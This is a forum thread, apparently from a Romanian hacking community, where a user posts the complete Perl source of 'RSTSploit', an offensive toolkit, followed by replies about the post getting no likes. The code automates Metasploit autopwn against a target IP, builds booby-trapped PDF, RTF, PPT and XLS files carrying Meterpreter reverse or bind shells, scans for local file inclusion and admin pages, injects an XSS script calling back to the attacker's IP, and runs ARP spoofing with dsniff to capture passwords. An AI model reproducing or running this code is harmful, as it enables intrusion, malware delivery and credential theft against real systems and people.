Jump to content
darkston3e

[RST] RSTSPLOIT v1.0

Recommended Posts

Posted (edited)

This tool uses 0day metasploit vulnerabilities ( plugins / modules ) made specially for RSTCENTER.COM coded in perl.

Recomand: Use it on Backtrack 5, or RC1 *or higher* for best results.

http://code.google.com/p/rstsploit/downloads/list ( contains the rest of the files )

Pass for rar: rstcenter.com

#

--------------------------------------------------

# RSTSploit ToolKit

# --------------------------------------------------

# Copyright © <2012> <DarkStone>

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

#

#

#

# RSTSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

# RSTsploit Toolkit Version 1.0

#

# Description :

#

# [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service

# [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin

# [+]format infector - inject reverse & bind payload into file format

# [+]phpmyadmin - Search Target phpmyadmin login page

# [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF

# [+]apache users - search server username directory (if use from apache webserver)

# [+]Dir Bruter - brute target directory with wordlist

# [+]admin finder - search admin & login page of target

# [+]MLITM,XSS Phishing - Man Left In The Middle Attack

# [+]MITM - Man In The Middle Attack

#

# About Author :

#

# Founder : DarkStone

# Email : darkston3e@yahoo.com

# Thanks To : Hippi & Cr0w for helping


#!/usr/bin/perl
#
--------------------------------------------------
# RSTSploit ToolKit
# --------------------------------------------------
# Copyright (C) <2012> <DarkStone>
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
#
#
# RSTSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability
# RSTsploit Toolkit Version 1.0
#
# Description :
#
# [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
# [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
# [+]format infector - inject reverse & bind payload into file format
# [+]phpmyadmin - Search Target phpmyadmin login page
# [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
# [+]apache users - search server username directory (if use from apache webserver)
# [+]Dir Bruter - brute target directory with wordlist
# [+]admin finder - search admin & login page of target
# [+]MLITM,XSS Phishing - Man Left In The Middle Attack
# [+]MITM - Man In The Middle Attack
#
# About Author :
#
# Founder : DarkStone
# Email : darkston3e@yahoo.com
# Thanks To : Hippi & Cr0w for helping
#
use Term::ANSIColor qw(:constants);
use HTTP::Request;
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
$header = int rand (6);
open (HDR, "hdr//$header.wsf");
@RHDR=<HDR>;
$email = 'darkston3e@yahoo.com';
print GREEN, "@RHDR", RESET;
print "\n\n";
print CYAN ")=-=-=-=[ RSTSploit Toolkit Version 1.0\n", RESET;
print CYAN ")=-=-=-=[ Report Bug : $email\n", RESET;
print "\n\n";
print "\tID & Name\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]AutoPWN\t\t Scan,Detect Target Service's And Exploit Automated\n";
print "\t[2]Wmap\t\t\t Crawler,Scan Target Web Service\n";
print "\t[3]Format Infector\t Inject Custom Payload Into File Formats\n";
print "\t[4]PHPMyAdmin\t\t Scan PHPMyAdmin Page\n";
print "\t[5]LFI\t\t\t Scan Local File Inclusion Vulnerability\n";
print "\t[6]Apache User\t\t Scan Apache User's Directory\n";
print "\t[7]Dir Bruter\t\t Brute Force Directory Of Target Site\n";
print "\t[8]Admin Finder\t\t Scan Target Admin Page\n";
print "\t[9]MLITM Attack\t\t Man Left In The Middle, XSS Phishing Attack\n";
print "\t[10]MITM Attack\t\t Man In The Middle Attack\n";
print "\n";
print CYAN, UNDERLINE "wsf", RESET;
print " > ";
$selector = <STDIN>;
chomp ($selector);
if ($selector ==1){&autopwn}
if ($selector ==2){&wmap}
if ($selector ==3){&infector}
if ($selector ==4){&phpmyadmin}
if ($selector ==5){&lfi}
if ($selector ==6){&apache}
if ($selector ==7){&DBR}
if ($selector ==8){&admin}
if ($selector ==9){&MLITM}
if ($selector ==10){&MITM}
sub autopwn {
print "\n";
print YELLOW, BOLD "[*]Scan Target Service's With NMAP\n", RESET;
print YELLOW, BOLD "[*]Detect Target Service's Via Open Ports\n", RESET;
print YELLOW, BOLD "[*]Launch All Exploit ...\n", RESET;
print RED, BOLD, UNDERLINE "[*]Use From Bind Payload,So Not Need To The Valid IP Address\n\n", RESET;
print CYAN, UNDERLINE "wsf:Autopwn", RESET;
print " > Enter Target IP Address : ";
$target_ip = <STDIN>;
chomp ($target_ip);
print BLUE, BOLD "[*]Your Target => $target_ip\n";
print "[*]Engine Started ...\n", RESET;
if (-e "tmp//rstsploit_autopwn.rc"){system ("rm -rf tmp//rstsploit_autopwn.rc")}
open (APF, ">>tmp//rstsploit_autopwn.rc");
print APF "workspace -d rstsploit\n";
print APF "workspace -a rstsploit\n";
print APF "db_nmap $target_ip\n";
print APF "db_autopwn -t -x -p -e\n";
close (APF);
system ("msfconsole -r tmp//rstsploit_autopwn.rc");
exit;

}
sub wmap {
print "\n";
print YELLOW, BOLD "[*]Scan WebServer & Version Of Target\n";
print "[*]Crawler Target WebSite\n";
print "[*]Scan Webdav & etc About Target Server & Site\n\n", RESET;
print CYAN, UNDERLINE "wsf:Wmap", RESET;
print " > Enter Your Target IP Address : ";
$target_ip = <STDIN>;
chomp ($target_ip);
print BLUE, BOLD "[*]Your Target IP => $target_ip\n";
print "[*]Engine Started ...\n", RESET;
sleep (2);
if (-e "tmp//rstsploit_wmap.rc"){system ("rm -rf tmp//rstsploit_wmap.rc")}
open (WMS, ">>tmp//rstsploit_wmap.rc");
print WMS "workspace -d rstsploit-wmap\n";
print WMS "workspace -a rstsploit-wmap\n";
print WMS "load wmap\n";
print WMS "sleep 3\n";
print WMS "wmap_targets -c\n";
print WMS "wmap_sites -a $target_ip\n";
print WMS "wmap_targets -t $target_ip\n";
print WMS "wmap_run -t\n";
print WMS "sleep 3\n";
print WMS "wmap_run -e\n";
close (WMS);
system ("msfconsole -r tmp//rstsploit_wmap.rc");
exit;
}
sub infector {
print "\n";
print "\tID & Format\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]PDF\t\t\t Adobe Flash Player [newfunction] Invalid Pointer Use\n";
print "\t[2]RTF\t\t\t Microsoft Word RTF [pFragments] Stack Buffer Overflow\n";
print "\t[3]PPT\t\t\t Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow\n";
print "\t[4]XLS\t\t\t Microsoft Excel Malformed FEATHEADER Record Vulnerability\n";
print "\t[5]VBP\t\t\t Microsoft Visual Basic VBP Buffer Overflow\n";
print "\t[6]EPS\t\t\t Adobe Illustrator CS4 v14.0.0\n";
print "\n";
print CYAN, UNDERLINE "wsf:Infector", RESET;
print " > Enter The ID Of Format : ";
$selector_2 = <STDIN>;
chomp ($selector_2);
if ($selector_2 ==1){$expl_name = "exploit/windows/fileformat/adobe_flashplayer_newfunction"}
if ($selector_2 ==2){$expl_name = "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof"}
if ($selector_2 ==3){$expl_name = "exploit/windows/fileformat/ms10_004_textbytesatom"}
if ($selector_2 ==4){$expl_name = "exploit/windows/fileformat/ms09_067_excel_featheader"}
if ($selector_2 ==5){$expl_name = "exploit/windows/fileformat/ms_visual_basic_vbp"}
if ($selector_2 ==6){$expl_name = "exploit/windows/fileformat/adobe_illustrator_v14_eps"}
print "\n";
print CYAN, UNDERLINE "wsf:Infector", RESET;
print " > Enter Your IP Address (Use In Reverse Payload) : ";
$ourip = <STDIN>;
chomp ($ourip);
print "\n";
print "\tID & Payload\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]Bind TCP\t\t Windows Meterpreter (Reflective Injection), Bind TCP Stager\n";
print "\t[2]Reverse TCP\t\t Windows Meterpreter (Reflective Injection), Reverse TCP Stager\n";
print "\t[3]DLL,Reverse\t\t Reflective Dll Injection, Reverse TCP Stager\n";
print "\t[4]DLL,Bind\t\t Reflective Dll Injection, Bind TCP Stager\n";
print "\n";
print CYAN, UNDERLINE "wsf:Infector", RESET;
print " > Select Payload : ";
$selector_3 = <STDIN>;
chomp ($selector_3);
if ($selector_3 ==1){$payload_name = "PAYLOAD=windows/meterpreter/bind_tcp"}
if ($selector_3 ==2){$payload_name = "PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourip"}
if ($selector_3 ==3){$payload_name = "PAYLOAD=windows/dllinject/reverse_tcp LHOST=$ourip"}
if ($selector_3 ==4){$payload_name = "PAYLOAD=windows/dllinject/bind_tcp"}


print "\n";
print "[!]-------[Information]-------[!]\n";
print "[!] Exploit : $expl_name\n";
print "[!] Payload : $payload_name\n";
print "[!] Location: /root/.msf4/data/exploits\n";
print "[!]---------------------------[!]\n";
print "\n";
sleep (1);
system ("msfcli $expl_name $payload_name E");
print "\n";
print GREEN, BOLD "[*] Do You Want To Create Listener ? <y/n> : ", RESET;
$les=<STDIN>;
chomp ($les);
if ($les =~ /y/){
system ("msfcli exploit/multi/handler $payload_name E");
}
else {
print YELLOW, BOLD "[*]Thank You For Using rstsploit,Have Nice Time\n";
print "[*]Bye Bye\n", RESET;
}
}
sub phpmyadmin {
$res_code = "200";
print "\n";
print YELLOW, BOLD "[*]PHPMyAdmin Login Page Finder\n";
print "[*]Enter Target Address (ex : http://site.com)\n\n", RESET;
print CYAN, UNDERLINE "wsf:PHPMyAdmin", RESET;
print " > Enter Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print GREEN, BOLD "[*]Loading List ...\n", RESET;
sleep (2);
print GREEN, BOLD "[*]Scanning ...\n", RESET;
open (PHPMYADMIN, "<scr//phpmyadmin.csv") or die "[-]Error,Can't Found 'phpmyadmin.csv' File!\n";
while (<PHPMYADMIN>){
$path = $_;
chomp ($path);
$url=$target_add.$path;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($res_code)){
print GREEN "[+] [FOUND] ..... $path\n", RESET;
}
else {print RED "[-] [ERROR] ..... $path\n", RESET;}
}
close(PHPMYADMIN);
print "\n";
print "DONE.\n";
}
sub lfi {
print "\n";
print YELLOW, BOLD "[*]Scan Local File Inclusion Vulnerability On Your Target\n";
print "[*]Can Be Bypass Some Web Application Firewall (WAF)\n";
print "[*]Enter Target (ex : http://site.com/index.php?page=)\n", RESET;
print CYAN, UNDERLINE "wsf:LFI", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print "\n";
print YELLOW, BOLD "[*]Engine Started ...\n", RESET;
sleep (2);
print YELLOW, BOLD "[+]Scanning ...\n", RESET;
print "\n";
open (LFI, "<scr//lfi.csv") or die "[-]Error,Can't Found 'lfi.csv' File!\n";
while (<LFI>){
$try = $_;
chomp ($try);
$url=$target_add.$try;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/){
print GREEN, BOLD "[+] [FOUND] $try\n", RESET;
}
else {
print "";
}


}
close (LFI);
print "\n";
print YELLOW, BOLD "[*]DONE.\n", RESET;
}
sub apache {
$res_code = "200";
print "\n";
print YELLOW, BOLD "[!]Brute Apache Directory Of Users\n";
print "[!]Enter Target (ex : http://site.com)\n", RESET;
print CYAN, UNDERLINE "wsf:Apache", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print YELLOW, BOLD "[*]Loading Users List ...\n", RESET;
sleep (2);
print YELLOW, BOLD "[*]Engine Started ...\n";
print "[*]Scanning ...\n", RESET;
open (APACHE, "<scr//apache.csv") or die "[-]Error, Can't Found 'apache.csv' File!\n";
while (<APACHE>){
$user = $_;
chomp ($user);
$url=$target_add.$user;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($res_code)){
print GREEN, BOLD "[+][FOUND] ... $url\n", RESET;
}
else {print "";}

}
close (APACHE);
print "\n";
print YELLOW, BOLD "[*]DONE.\n", RESET;
}
sub DBR {
$code="2xx";
print "\n";
print YELLOW, BOLD "[*]Brute Target Directory With WordList\n";
print "[*]Enter Target Address (ex : http://site.com/)\n\n", RESET;
print CYAN, UNDERLINE "wsf:DirBruter", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print BLUE, BOLD "\n[*]Loading WordList ...\n";
sleep (2);
print "[*]Engine Started ...\n";
print "[*]Scanning ...\n", RESET;
print "\n";
open (WORDLIST, "<scr//DBR.csv") or die "[-]Error,Can't Found 'DBR.csv' File!\n";
while (<WORDLIST>){
$wl=$_;
chomp ($wl);
$slash="/";
$url = $target_add.$slash.$wl;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($code)){
print GREEN "[+] [FOUND] ... $url\n", RESET;
}
else {print RED "[-] [ERROR] ... $url\n", RESET;}
}
close (WORDLIST);
print "\n";
print YELLOW, BOLD "[*]DONE.\n";
}
sub admin {
$res_code="200";

print YELLOW, BOLD "[*]Scan Admin/Login Page Of Your Target\n";
print "[*]Enter Target Address (ex : http://site.com)\n", RESET;
print CYAN, UNDERLINE "wsf:AdminFinder", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print BLUE, BOLD "[*]Loading Admin Page Name List ...\n";
sleep (2);
print "[!]Engine Started ...\n";
print "[!]Scanning ...\n", RESET;
print "\n";
open (ADMINS, "<scr//admins.csv") or die "[-]Error,Can't Found 'admins.csv' File!\n";
while (<ADMINS>){
$adminpath=$_;
chomp ($adminpath);
$url = $target_add.$adminpath;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($res_code)){
print GREEN "[+] [FOUND] ... $url\n", RESET;
}
else {print RED "[-] [ERROR] ... $url\n", RESET;}
}
close (ADMINS);
print "\n";
print YELLOW, BOLD "[*]DONE.\n", RESET;

}
sub MLITM {
print "\n";
print RED BOLD "[*]Written by DarkStone\n";
print '[*]darkston3e@yahoo.com';
print "\n";
print YELLOW BOLD "[*]This is not an exploit tool, it's a payload tool.\n";
print "[*]Once you've found the exloit, and you're able to inject javascript,\n";
print "[*]just stick this in there as a script.\n";
print '[*]<script src="http://YOURIP/">', RESET;
print "\n";
print BLUE BOLD "[*]Stoping Web Server ... ", RESET;
system ("xterm -e service apache2 stop");
sleep (2);
print BLUE BOLD "OK\n", RESET;
print "\n";
print CYAN UNDERLINE "wsf:MLITM", RESET;
print " > Press [ENTER] For Start XSS Phishing Attack : ";
$enter = <STDIN>;
system ("python scr//thebiz.py");
}
sub MITM {
print "\n";
print YELLOW BOLD "[*]Man In The Middle Attack\n", RESET;
print YELLOW BOLD "[*]Sniff Victim Information In Your Network\n", RESET;
print YELLOW BOLD "[*]Enter Interface Name (ex : eth0 ,eth1 ,wlan0)\n", RESET;
print CYAN UNDERLINE "wsf:MITM", RESET;
print " > Enter Interface Name : ";
$interface_name = <STDIN>;
chomp ($interface_name);
print CYAN UNDERLINE "wsf:MITM", RESET;
print " > Enter Router IP Address : ";
$router_ip = <STDIN>;
chomp ($router_ip);
print CYAN UNDERLINE "wsf:MITM", RESET;
print " > Enter Target IP Address : ";
$target_ip = <STDIN>;
chomp ($target_ip);
print "\n";
print "\tSniffers\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]DSniffer\t\t Sniff All Passwords\n";
print "\t[2]Msgsnarf\t\t Sniff All Text Of Victim Messengers\n";
print "\t[3]Urlsnarf\t\t Sniff Victim Links\n";
print "\t[4]Driftnet\t\t Sniff Victim Images\n";
print "\n";
print CYAN UNDERLINE "msf:MITM", RESET;
print " > Enter Selected Sniffer ID : ";
$sniff_selector = <STDIN>;
chomp ($sniff_selector);
if ($sniff_selector ==1){$selected_sniffer="dsniff -i $interface_name"}
if ($sniff_selector ==2){$selected_sniffer="msgsnarf -i $interface_name"}
if ($sniff_selector ==3){$selected_sniffer="urlsnarf -i $interface_name"}
if ($sniff_selector ==4){$selected_sniffer="driftnet -i $interface_name"}
# ip forwarding section
print "\n";
print BLUE BOLD "[*]IP Forwarding ... ", RESET;
$p_forwarding = 'xterm -T "RSTSploit - Port Forwarding ..." -e "echo 1 > /proc/sys/net/ipv4/ip_forward"';
system ("$p_forwarding");
sleep (2);
print BLUE BOLD "OK\n", RESET;
print BLUE BOLD "[*]ARP Spoofing ... ", RESET;
$arp_spoofing1 = "xterm -e arpspoof -i $interface_name -t $target_ip $router_ip &";
$arp_spoofing2 = "xterm -e arpspoof -i $interface_name -t $router_ip $target_ip &";
print BLUE BOLD "OK\n", RESET;
system ("$arp_spoofing1");
sleep (1);
system ("$arp_spoofing2");
sleep (1);
system ("$selected_sniffer");


}

#
# RSTsploit Toolkit Version 1.0
# Written By DarkStone
# RSTSploit Project : https://www.rstcenter.com

Edited by darkston3e
Google code added
  • Upvote 1
Posted

Asta este ultimul release care il fac pentru RST.

Nici macar 1 like, nici macar 1 comment ( nu are sens ).

Lumea a uitat sa aprecieze, am incercat de mai multe ori, si in loc de multumiri, am primit numai flame-uri.

Posted (edited)

Ai rabdare, in 10 ore de azi dimineata pana acum cine crezi ca apuca sa vada sau sa testeze asa ceva ?

Oricum mie imi place cat de cat cum ai organizat codul desi mai mergea putin lucrat la partea de lizibilitate, dar arata mult mai bine decat majoritatea lucrurilor ce se posteaza pe aici.

Stai linistit ca am si eu multe posturi in Python care nu au primit un gram de atentie sau pentru care chiar am muncit in special pentru anumite lucruri, iar cateva scripturi de cacat care le-am pus asa pur si simplu sa mai fac un thread doar ca sa ajut pe cineva cu o chestie au mult mai multe vizualizari si likeuri, dar nu o fac pe ipocritul sa spun ca ma deranjeaza, ci las acolo postul sa fie si sa vina in ajutorul celui ce cauta si are nevoie. De acest lucru mi-am dat seama demult si nu regret niciun efort deoarece in tot ce am facut a existat si un interes personal si chiar m-a ajutat "practica" asta.

Asa ca, inainte sa spui ceea ce ai spus mai sus, mai gandeste-te o data si pleaca de la o "fundatie" bazata pe ideea ce tot ce faci faci pentru tine nu pentru altii, nu pentru rst si niciun efort nu e in zadar.

Edited by cmiN
Posted

Sunt la munca si nu am putut sa ma uit peste el sa ma dau cu parerea, nu te mai purta copilareste, ca o "attention whore".

Codul e frumos organizat, dar nu am timp sa il citesc sa vad exact despre ce e vorba, o sa ma uit diseara.

Posted

@cmiN;

Good point..

@Nytro;

Ok, imi cer scuze, am fost putin cam recalcitrant cand m-am trezit si nu am vazut nici macar 1 like sau un comment ( dar acum realizez ca nu foarte multe persoane folosesc astfel de creatii pentru ca ii depaseste ).

P.S: This script is not for dummies :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...